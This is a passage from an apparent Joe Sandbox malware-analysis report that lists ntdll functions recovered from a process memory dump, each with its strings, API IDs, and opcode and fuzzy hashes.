                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: 8a2c6009f1777676f6c53fa3676e4e553ead58a3fb70103968640c4bb18f2f7b
                                                                                                                                                                                                          • Instruction ID: 3019df1ea041ddfa8a02d8c501d974374188359a628e8d011988de528f307ef4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a2c6009f1777676f6c53fa3676e4e553ead58a3fb70103968640c4bb18f2f7b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A51D6A6F041166FCB10DF98898097FF7B8BB09200714866BF865DF742D3B4DE418BA4
                                                                                                                                                                                                          Function 034C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: 5102e00d108c51c95573ba6f7a9b248561d73f2140376fc3fb5de3a34a3116ba
                                                                                                                                                                                                          • Instruction ID: 46d990060dc22da5a99ed470a0b9e2df591d6452796411039c7e7de5bb753360
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5102e00d108c51c95573ba6f7a9b248561d73f2140376fc3fb5de3a34a3116ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E151D579A10685AFCFA0DE58C99097FF7F99B44204B0488AFE495DB682D7F4DA008768
                                                                                                                                                                                                          Function 03447630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03484725
                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034846FC
                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03484655
                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 03484787
                                                                                                                                                                                                          • ExecuteOptions, xrefs: 034846A0
                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03484742
                                                                                                                                                                                                          • Execute=1, xrefs: 03484713
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                                          • Opcode ID: 1f3d1aa2a83befafe8f9b1941b3fcc7177d2b25d59b6d2db8e578e4c12fa0530
                                                                                                                                                                                                          • Instruction ID: 0440aebf568cc2f54faeb68a0bb35d691bacf63c11be26c09254c88424234c32
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f3d1aa2a83befafe8f9b1941b3fcc7177d2b25d59b6d2db8e578e4c12fa0530
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3514D35A003096EEF10EBA5ED85FAE7BADEF04310F4400BBE515AF291D7719A468F58
                                                                                                                                                                                                          Function 034E6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                                          • Instruction ID: ec58b41c6005c1b87a179d2b917119a40358e864d62b5e2c575b4177847acbc9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD023375508341AFC308CF19C890A6FBBE5EFD8710F458A2EF9998B264DB35E905CB46
                                                                                                                                                                                                          Function 0345B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                                                                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                          • Instruction ID: 26f63799ba6d26dae8d218fe9062fd06f6d1f6d4192a13d25ad81e095b955b96
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA818D74E062499EDF28CE68C8917BEBBA6EF45310F1C415BFC61AF392C63498418B59
                                                                                                                                                                                                          Function 034C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                                                                                          • Opcode ID: d2bb7d9eba809f2a570fb9625ba5c300a2e1289c52fff79ea633092e9ff2eb66
                                                                                                                                                                                                          • Instruction ID: 8559993156ca4a1cab43de09e3b121ed6c44630af025f826aab9bab6f3880d30
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2bb7d9eba809f2a570fb9625ba5c300a2e1289c52fff79ea633092e9ff2eb66
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421867AE10259AFCB11DF79D8409EFB7E8EF44644F08052BE905DB201EBB0D9018B95
                                                                                                                                                                                                          Function 0343F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 0348031E
                                                                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034802E7
                                                                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034802BD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                                                                          • Opcode ID: e98184089f3500b5ebbfa7123f4e213f08c33ae796c17b1b3b5fd0a9094d29d7
                                                                                                                                                                                                          • Instruction ID: 2755a11ba71383185ddf1afdafd763b2001095356561658621ced887437da97d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e98184089f3500b5ebbfa7123f4e213f08c33ae796c17b1b3b5fd0a9094d29d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82E1AF30A14741AFD725DF28C884B2AB7E0BB49324F180A5EF5A58F3E1D775D849CB4A
                                                                                                                                                                                                          Function 0344BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 03487BAC
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 03487B8E
                                                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03487B7F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                                                                          • Opcode ID: 10def150f1918d4b7f048c5aa15a5491af778f3fb632be0008c09ef46ffb6424
                                                                                                                                                                                                          • Instruction ID: 1075834b84242267269533910b2185f7b99855c926a1060219b6de719cde3733
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10def150f1918d4b7f048c5aa15a5491af778f3fb632be0008c09ef46ffb6424
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B41B4357007025FE724DE29C850B6BB7E5EB84711F140A2EE999DF780D731E8058B99
                                                                                                                                                                                                          Function 0344B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0348728C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 034872C1
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 034872A3
                                                                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03487294
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                                                                          • Opcode ID: 4672cb2e99244ca9eb098ae8b6d3fe900646eea4e5bbf3334521dc730da70bef
                                                                                                                                                                                                          • Instruction ID: f1a4aa4b665507de3a69f39c8988bbe31ea06a84f12a178c10421699bfa8dce5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4672cb2e99244ca9eb098ae8b6d3fe900646eea4e5bbf3334521dc730da70bef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB41E135600206AFEB20EF25CC41B6ABBA5FB44714F24062AF995EF740DB31E85687D9
                                                                                                                                                                                                          Function 034C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                                                          • Opcode ID: 6c2407c3932a4aa0b0f96764d84e9bd2400441db2e5ac403c0342b9c337c2055
                                                                                                                                                                                                          • Instruction ID: b2e6629d9a7964a8780bfd27a6f66e2c2c70437ac8aba97922777a72a36db50c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c2407c3932a4aa0b0f96764d84e9bd2400441db2e5ac403c0342b9c337c2055
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0931877AA102599FCF60DE39CC40BEFB7F8EB44610F54059BE849EB240EB709A45CB64
                                                                                                                                                                                                          Function 03457D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                                                          • String ID: +$-
                                                                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                                                                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                          • Instruction ID: 7eb3dfe232cdeb2e52da3fa0b7ef6cc97d02eedaca4df1a497c6d032144d0bce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F919172E402159FDB24DE69C8806BFBBA5AF44720F58452BFC65EF3C2DB3099418758
                                                                                                                                                                                                          Function 03419126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                                                                          • Opcode ID: d95b33f955c0b1340d78325984168d9ea01ed248d71e515d28c23a08ba47d380
                                                                                                                                                                                                          • Instruction ID: 601303d690e87695438ba3b3d3b84bed49e0b513a15a6513476aeae7f36e70e3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d95b33f955c0b1340d78325984168d9ea01ed248d71e515d28c23a08ba47d380
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F815875D002699BDB31CF54CC44BEAB7B8AB08750F0445EBE919BB290D7709E85CFA4